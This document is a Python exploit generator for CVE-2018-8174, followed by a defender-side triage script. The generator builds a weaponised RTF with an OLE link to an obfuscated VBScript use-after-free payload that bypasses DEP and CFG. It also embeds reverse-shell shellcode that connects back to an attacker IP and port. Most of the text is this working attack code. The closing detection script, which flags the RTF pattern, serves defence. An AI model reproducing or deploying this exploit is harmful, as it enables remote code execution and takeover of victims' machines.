usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]
Exploit for CVE-2018-8174
optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     exp url
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
  -i IP, --ip IP        ip for netcat
  -p PORT, --port PORT  port for netcat
eg:
enjoy it !
POC:
1 import argparse 2 import struct 3 4 SampleRTF = R"""{rtf1ansiansicpg1252deff0deflang1033{fonttbl{f0fnilfcharset0 Calibri;}} 5 {*generator Msftedit 5.41.21.2510;}viewkind4uc1pardsa200sl276slmult1lang9f0fs22{objectobjautlinkobjupdatersltpictobjw4321objh4321{*objclass htmlfile}{*objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000 6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b 15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000 16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000 17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000 18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 19 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000 23 UNICODE_URL 24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000 25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700 26 NORMAL_URL 27 0000bbbbcccc2700 28 UNICODE_URL 29 0000000000000000000000000000000000000000000000000000 30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000 31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000} 32 }par 33 } 34 """ 35 36 SampleHTML = R""" 37 <!doctype html> 38 <html lang="en"> 39 <head> 40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 41 <meta 
http-equiv="x-ua-compatible" content="IE=10"> 42 <meta http-equiv="Expires" content="0"> 43 <meta http-equiv="Pragma" content="no-cache"> 44 <meta http-equiv="Cache-control" content="no-cache"> 45 <meta http-equiv="Cache" content="no-cache"> 46 </head> 47 <body> 48 <script language="vbscript"> 49 Dim lIIl 50 Dim IIIlI(6),IllII(6) 51 Dim IllI 52 Dim IIllI(40) 53 Dim lIlIIl,lIIIll 54 Dim IlII 55 Dim llll,IIIIl 56 Dim llllIl,IlIIII 57 Dim NtContinueAddr,VirtualProtectAddr 58 IlII=195948557 59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000") 60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000") 61 IllI=195890093 62 Function IIIII(Domain) 63 lIlII=0 64 IllllI=0 65 IIlIIl=0 66 Id=CLng(Rnd*1000000) 67 lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99) 68 If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then 69 lIlII=lIlII-(&h86d+6447-&H219b) 70 End If 71 IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255) 72 IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e) 73 IIIII=Domain &"?" 
&Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII 74 End Function 75 Function lIIII(ByVal lIlIl) 76 IIll="" 77 For index=0 To Len(lIlIl)-1 78 IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2) 79 Next 80 IIll=IIll &"00" 81 If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then 82 IIll=IIll &"00" 83 End If 84 For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4) 85 lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3)) 86 lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504)) 87 lIIII=lIIII &"%u" &lIlIll &lIIIlI 88 Next 89 End Function 90 Function lIlI(ByVal Number,ByVal Length) 91 IIII=Hex(Number) 92 If Len(IIII)<Length Then 93 IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros 94 Else 95 IIII=Right(IIII,Length) 96 End If 97 lIlI=IIII 98 End Function 99 Function GetUint32(lIII)100 Dim value101 llll.mem(IlII+8)=lIII+4102 llll.mem(IlII)=8 'type string103 value=llll.P0123456789104 llll.mem(IlII)=2105 GetUint32=value106 End Function107 Function IllIIl(lIII)108 IllIIl=GetUint32(lIII) And (131071-65536)109 End Function110 Function lllII(lIII)111 lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)112 End Function113 Sub llllll114 End Sub115 Function GetMemValue116 llll.mem(IlII)=(&h713+3616-&H1530)117 GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))118 End Function119 Sub SetMemValue(ByRef IlIIIl)120 llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl121 End Sub122 Function LeakVBAddr123 On Error Resume Next124 Dim lllll125 lllll=llllll126 lllll=null127 SetMemValue lllll128 LeakVBAddr=GetMemValue()129 End Function130 Function GetBaseByDOSmodeSearch(IllIll)131 Dim llIl132 llIl=IllIll And &hffff0000133 Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692134 llIl=llIl-65536135 Loop136 GetBaseByDOSmodeSearch=llIl137 End Function138 Function StrCompWrapper(lIII,llIlIl)139 Dim lIIlI,IIIl140 lIIlI=""141 For 
IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)142 lIIlI=lIIlI &Chr(lllII(lIII+IIIl))143 Next144 StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))145 End Function146 Function GetBaseFromImport(base_address,name_input)147 Dim import_rva,nt_header,descriptor,import_dir148 Dim IIIIII149 nt_header=GetUint32(base_address+(&h3c))150 import_rva=GetUint32(base_address+nt_header+&h80)151 import_dir=base_address+import_rva152 descriptor=0153 Do While True154 Dim Name155 Name=GetUint32(import_dir+descriptor*(&h14)+&hc)156 If Name=0 Then157 GetBaseFromImport=&hBAAD0000158 Exit Function159 Else160 If StrCompWrapper(base_address+Name,name_input)=0 Then161 Exit Do162 End If163 End If164 descriptor=descriptor+1165 Loop166 IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)167 GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))168 End Function169 Function GetProcAddr(dll_base,name)170 Dim p,export_dir,index171 Dim function_rvas,function_names,function_ordin172 Dim Illlll173 p=GetUint32(dll_base+&h3c)174 p=GetUint32(dll_base+p+&h78)175 export_dir=dll_base+p176 function_rvas=dll_base+GetUint32(export_dir+&h1c)177 function_names=dll_base+GetUint32(export_dir+&h20)178 function_ordin=dll_base+GetUint32(export_dir+&h24)179 index=0180 Do While True181 Dim lllI182 lllI=GetUint32(function_names+index*4)183 If StrCompWrapper(dll_base+lllI,name)=0 Then184 Exit Do185 End If186 index=index+1187 Loop188 Illlll=IllIIl(function_ordin+index*2)189 p=GetUint32(function_rvas+Illlll*4)190 GetProcAddr=dll_base+p191 End Function192 Function GetShellcode()193 IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))194 IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))195 GetShellcode=IIlI196 End Function197 Function EscapeAddress(ByVal value)198 Dim High,Low199 High=lIlI((value And &hffff0000)/&h10000,4)200 Low=lIlI(value And &hffff,4)201 EscapeAddress=Unescape("%u" &Low &"%u" &High)202 End Function203 Function lIllIl204 Dim 
IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI205 IlllI=lIlI(NtContinueAddr,8)206 IlIII=Mid(IlllI,1,2)207 llllI=Mid(IlllI,3,2)208 llIII=Mid(IlllI,5,2)209 lIllI=Mid(IlllI,7,2)210 IIlI=""211 IIlI=IIlI &"%u0000%u" &lIllI &"00"212 For IIIl=1 To 3213 IIlI=IIlI &"%u" &llllI &llIII214 IIlI=IIlI &"%u" &lIllI &IlIII215 Next216 IIlI=IIlI &"%u" &llllI &llIII217 IIlI=IIlI &"%u00" &IlIII218 lIllIl=Unescape(IIlI)219 End Function220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg221 Dim IIlI222 IIlI=String((100334-65536),Unescape("%u4141"))223 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)224 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)225 IIlI=IIlI &EscapeAddress(&h3000)226 IIlI=IIlI &EscapeAddress(&h40)227 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)228 IIlI=IIlI &String(6,Unescape("%u4242"))229 IIlI=IIlI &lIllIl()230 IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))231 WrapShellcodeWithNtContinueContext=IIlI232 End Function233 Function ExpandWithVirtualProtect(lIlll)234 Dim IIlI235 Dim lllllI236 lllllI=lIlll+&h23237 IIlI=""238 IIlI=IIlI &EscapeAddress(lllllI)239 IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))240 IIlI=IIlI &EscapeAddress(VirtualProtectAddr)241 IIlI=IIlI &EscapeAddress(&h1b)242 IIlI=IIlI &EscapeAddress(0)243 IIlI=IIlI &EscapeAddress(lIlll)244 IIlI=IIlI &EscapeAddress(&h23)245 IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))246 ExpandWithVirtualProtect=IIlI247 End Function248 Sub ExecuteShellcode249 llll.mem(IlII)=&h4d 'DEP bypass250 llll.mem(IlII+8)=0251 msgbox(IlII) 'VT replaced252 End Sub253 Class cla1254 Private Sub Class_Terminate()255 Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))256 IllI=IllI+(&h14b5+2725-&H1f59)257 lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)258 End Sub259 End Class260 Class cla2261 Private Sub Class_Terminate()262 Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))263 IllI=IllI+(&h880+542-&Ha9d)264 lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)265 End Sub266 End Class267 Class IIIlIl268 End Class269 
Class llIIl270 Dim mem271 Function P272 End Function273 Function SetProp(Value)274 mem=Value275 SetProp=0276 End Function277 End Class278 Class IIIlll279 Dim mem280 Function P0123456789281 P0123456789=LenB(mem(IlII+8))282 End Function283 Function SPP284 End Function285 End Class286 Class lllIIl287 Public Default Property Get P288 Dim llII289 P=174088534690791e-324290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)291 IIIlI(IIIl)=(&h2176+711-&H243d)292 Next293 Set llII=New IIIlll294 llII.mem=lIlIIl295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)296 Set IIIlI(IIIl)=llII297 Next298 End Property299 End Class300 Class llllII301 Public Default Property Get P302 Dim llII303 P=636598737289582e-328304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)305 IllII(IIIl)=(&h442+2598-&He68)306 Next307 Set llII=New IIIlll308 llII.mem=lIIIll309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)310 Set IllII(IIIl)=llII311 Next312 End Property313 End Class314 Set llllIl=New lllIIl315 Set IlIIII=New llllII316 Sub UAF317 For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)318 Set IIllI(IIIl)=New IIIlIl319 Next320 For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)321 Set IIllI(IIIl)=New llIIl322 Next323 IllI=0324 For IIIl=0 To 6325 ReDim lIIl(1)326 Set lIIl(1)=New cla1327 Erase lIIl328 Next329 Set llll=New llIIl330 IllI=0331 For IIIl=0 To 6332 ReDim lIIl(1)333 Set lIIl(1)=New cla2334 Erase lIIl335 Next336 Set IIIIl=New llIIl337 End Sub338 Sub InitObjects339 llll.SetProp(llllIl)340 IIIIl.SetProp(IlIIII)341 IlII=IIIIl.mem342 End Sub343 Sub StartExploit344 UAF345 InitObjects346 vb_adrr=LeakVBAddr()347 // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))348 vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))349 // Alert "VBScript Base: 0x" & Hex(vbs_base) 350 msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")351 // Alert "MSVCRT Base: 0x" & Hex(msv_base) 352 
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")353 // Alert "KernelBase Base: 0x" & Hex(krb_base) 354 ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")355 // Alert "Ntdll Base: 0x" & Hex(ntd_base) 356 VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")357 // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 358 NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")359 // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 360 SetMemValue GetShellcode()361 ShellcodeAddr=GetMemValue()+8362 // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 363 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)364 lIlll=GetMemValue()+69596365 SetMemValue ExpandWithVirtualProtect(lIlll)366 llIIll=GetMemValue()367 // Alert "Executing Shellcode"368 ExecuteShellcode369 End Sub370 StartExploit371 </script>372 </body>373 </html>374 """375 376 reverseip = '1.1.1.1'377 reverseport = 4444378 379 def create_rtf_file(url,filename):380 NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))381 UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)382 if len(UNICODE_URL) < 154:383 print 'UNICODE_URL len %d , need to pad ...' 
% len(UNICODE_URL)384 UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))385 res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)386 f = open(filename, 'w')387 f.write(res)388 f.close()389 print "Generated "+filename+" successfully"390 391 392 def rev_shellcode(ip,port):393 ip = [int(i) for i in ip.split(".")]394 buf = ""395 buf += "xfcxe9x8ax00x00x00x5dx83xc5x0bx81xc4x70"396 buf += "xfexffxffx8dx54x24x60x52x68xb1x4ax6bxb1"397 buf += "xffxd5x8dx44x24x60xebx5cx5ex8dx78x60x57"398 buf += "x50x31xdbx53x53x68x04x00x00x08x53x53x53"399 buf += "x56x53x68x79xccx3fx86xffxd5x85xc0x74x59"400 buf += "x6ax40x80xc7x10x53x53x31xdbx53xffx37x68"401 buf += "xaex87x92x3fxffxd5x54x68x44x01x00x00xeb"402 buf += "x39x50xffx37x68xc5xd8xbdxe7xffxd5x53x53"403 buf += "x53x8bx4cx24xfcx51x53x53xffx37x68xc6xac"404 buf += "x9ax79xffxd5xe9x41x01x00x00xe8x9fxffxff"405 buf += "xffx72x75x6ex64x6cx6cx33x32x2ex65x78x65"406 buf += "x00xe8x71xffxffxffxe8xc2xffxffxffxfcxe8"407 buf += "x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"408 buf += "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"409 buf += "x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01"410 buf += "xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4c"411 buf += "x11x78xe3x48x01xd1x51x8bx59x20x01xd3x8b"412 buf += "x49x18xe3x3ax49x8bx34x8bx01xd6x31xffxac"413 buf += "xc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3b"414 buf += "x7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0c"415 buf += "x4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44"416 buf += "x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"417 buf += "x8bx12xebx8dx5dx68x33x32x00x00x68x77x73"418 buf += "x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"419 buf += "x00x00x29xc4x54x50x68x29x80x6bx00xffxd5"420 buf += "x50x50x50x50x40x50x40x50x68xeax0fxdfxe0"421 buf += "xffxd5x97x6ax05x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"x68x02x00"422 buf += struct.pack("!H",port)+"x89xe6x6ax10x56x57x68x99xa5x74x61"423 buf += "xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0"424 buf += "xb5xa2x56xffxd5x68x63x6dx64x00x89xe3x57"425 buf += 
"x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44"426 buf += "x24x3cx01x01x8dx44x24x10xc6x00x44x54x50"427 buf += "x56x56x56x46x56x4ex56x56x53x56x68x79xcc"428 buf += "x3fx86xffxd5x89xe0x4ex56x46xffx30x68x08"429 buf += "x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95"430 buf += "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05"431 buf += "xbbx47x13x72x6fx6ax00x53xffxd5"432 433 return buf.encode("hex")434 435 def gen_shellcode(s):436 n = len(s)437 i = 0438 strs = ''439 if n % 4 == 2:440 s=s+'41'441 while i <n:442 strs += '%u'+s[i+2:i+4]+s[i:i+2]443 i+=4444 return strs445 446 if __name__ == '__main__':447 parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")448 parser.add_argument("-u", "--url", help="exp url", required=True)449 parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)450 parser.add_argument('-i', "--ip", help="ip for netcat", required=False)451 parser.add_argument('-p', "--port", help="port for netcat", required=False)452 args = parser.parse_args()453 url = args.url454 filename = args.output455 create_rtf_file(url,filename)456 if args.ip and args.port:457 ip = str(args.ip)458 port = int(args.port)459 shellcode = gen_shellcode(rev_shellcode(ip,port))460 else:461 shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))462 res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)463 f = open('exploit.html', 'w')464 f.write(res)465 f.close()466 467 print "!!! Completed !!!"
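The RTF that create_rtf_file() emits carries the lure as an OLE object whose \objdata hex blob holds the OLE2Link class name, the StdOleLink CLSID (00000300-...-46), the URL moniker CLSID (79EAC9E0-BAF9-11CE-8C82-00AA004BA90B) and the htmlfile CLSID (25336920-03F9-11CF-8FD0-00AA00686F13), with the URL stored both as ASCII (NORMAL_URL) and as length-prefixed UTF-16LE after the URL moniker CLSID (UNICODE_URL). Those markers are what a triage script should look for. The following is an added defender-side example, not code from the PoC above: it pulls every \objdata blob out of an RTF, checks for those markers, recovers the moniker URL, and flags the OLE2Link-to-htmlfile combination. The sample RTF it builds is constructed here and simplified (the real blob wraps the OLE2Link stream in a compound file; the byte scan still works on that as long as the stream is not split across sectors, which is an assumption worth checking with a proper CFB parser on real samples).

```python
import json
import re
import struct
import uuid

# CLSIDs visible in the PoC's objdata hex, in the little-endian byte order they
# have on disk (uuid.bytes_le produces exactly that layout).
CLSID_STD_OLE_LINK = uuid.UUID("00000300-0000-0000-C000-000000000046")  # "OLE2Link" object
CLSID_URL_MONIKER = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")   # URL moniker
CLSID_HTMLFILE = uuid.UUID("25336920-03F9-11CF-8FD0-00AA00686F13")      # htmlfile (MSHTML)

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
ASCII_URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def extract_objdata(rtf: bytes) -> list:
    """Return every \\objdata blob in the RTF, hex-decoded."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:          # stray trailing nibble: drop it instead of failing
            hexdata = hexdata[:-1]
        blobs.append(bytes.fromhex(hexdata.decode("ascii")))
    return blobs


def moniker_url(blob: bytes):
    """Recover the UTF-16LE URL that follows the URL moniker CLSID (CLSID, u32 length, string)."""
    idx = blob.find(CLSID_URL_MONIKER.bytes_le)
    if idx < 0 or idx + 20 > len(blob):
        return None
    (length,) = struct.unpack_from("<I", blob, idx + 16)
    raw = blob[idx + 20: idx + 20 + length]
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def analyse_rtf(rtf: bytes) -> dict:
    """Triage an RTF for the OLE2Link / URL moniker / htmlfile delivery pattern."""
    result = {
        "objclass_htmlfile": b"\\objclass htmlfile" in rtf,
        "ole2link": False,
        "url_moniker": False,
        "htmlfile_clsid": False,
        "urls": [],
    }
    for blob in extract_objdata(rtf):
        if b"OLE2Link" in blob or CLSID_STD_OLE_LINK.bytes_le in blob:
            result["ole2link"] = True
        if CLSID_URL_MONIKER.bytes_le in blob:
            result["url_moniker"] = True
            url = moniker_url(blob)
            if url and url not in result["urls"]:
                result["urls"].append(url)
        if CLSID_HTMLFILE.bytes_le in blob:
            result["htmlfile_clsid"] = True
        for m in ASCII_URL_RE.finditer(blob):          # NORMAL_URL, stored as plain ASCII
            url = m.group(0).decode("ascii")
            if url not in result["urls"]:
                result["urls"].append(url)
    # A linked OLE object that resolves a URL into an htmlfile (MSHTML) handler is the
    # delivery shape of this PoC; each marker alone is common in benign documents.
    result["suspicious"] = (result["ole2link"] and result["url_moniker"]
                            and (result["objclass_htmlfile"] or result["htmlfile_clsid"]))
    return result


# --- constructed sample for offline testing (assumption: simplified blob, no CFB wrapper) ---
SAMPLE_URL = "http://example.invalid/poc"


def build_sample_blob(url: str) -> bytes:
    blob = struct.pack("<III", 0x501, 2, 9) + b"OLE2Link\x00"   # OLE 1.0 header as in the PoC
    blob += b"\x00" * 16                                        # filler standing in for the CFB
    blob += CLSID_STD_OLE_LINK.bytes_le + CLSID_HTMLFILE.bytes_le
    url_utf16 = url.encode("utf-16-le") + b"\x00\x00"
    blob += CLSID_URL_MONIKER.bytes_le + struct.pack("<I", len(url_utf16)) + url_utf16
    blob += url.encode("ascii") + b"\x00" * 8                   # ASCII copy, zero padded
    return blob


def build_sample_rtf(url: str = SAMPLE_URL) -> bytes:
    hexdata = build_sample_blob(url).hex()
    lines = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    head = r"{\rtf1\ansi\deff0{\fonttbl{\f0\fnil\fcharset0 Calibri;}}" + "\n"
    obj = (r"{\object\objautlink\objupdate\rsltpict\objw4321\objh4321"
           r"{\*\objclass htmlfile}{\*\objdata " + "\n" + lines + "}}\n}\n")
    return (head + obj).encode("ascii")


if __name__ == "__main__":
    print(json.dumps(analyse_rtf(build_sample_rtf()), indent=2))
```

Run it on a real file with analyse_rtf(open(path, "rb").read()); the recovered URL is the indicator to block and hunt for, and a document that trips "suspicious" but not "objclass_htmlfile" is still worth a look, since the CLSID check does not depend on the writer leaving the objclass control word in place.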